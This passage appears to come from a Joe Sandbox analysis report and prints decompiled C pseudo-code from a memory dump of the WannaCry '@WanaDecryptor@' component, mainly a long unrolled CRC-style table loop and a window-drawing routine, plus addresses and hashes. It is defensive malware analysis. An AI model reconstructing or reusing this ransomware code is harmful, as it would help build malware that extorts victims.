0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 8;
							_t115 = _t115 - 1;
						} while (_t115 != 0);
					}
					if(_t118 != 0) {
						do {
							_t29 = _t29 >> 0x00000008 ^  *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 1;
							_t118 = _t118 - 1;
						} while (_t118 != 0);
					}
					return  !_t29;
				} else {
					return 0;
				}
			}







                                  0x0040ff90
                                  0x0040ff96
                                  0x0040ffa1
                                  0x0040ffa8
                                  0x0040ffaa
                                  0x0040ffb3
                                  0x0040ffb6
                                  0x0040ffd0
                                  0x00410093
                                  0x00410095
                                  0x00410096
                                  0x00410096
                                  0x0041009d
                                  0x004100a0
                                  0x004100a2
                                  0x004100ba
                                  0x004100bc
                                  0x004100bd
                                  0x004100bd
                                  0x004100a2
                                  0x004100c4
                                  0x0040ff98
                                  0x0040ff9a
                                  0x0040ff9a

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                  • Instruction ID: cecdefe8fda50f928b4117980ad8d25e533be349777a256c316ace181cfd3b57
                                  • Opcode Fuzzy Hash: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                  • Instruction Fuzzy Hash: 1E31A6627A959207D350CEBEAC90277BB93D7DB306B6CC678D584C7A0EC579D8078244
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
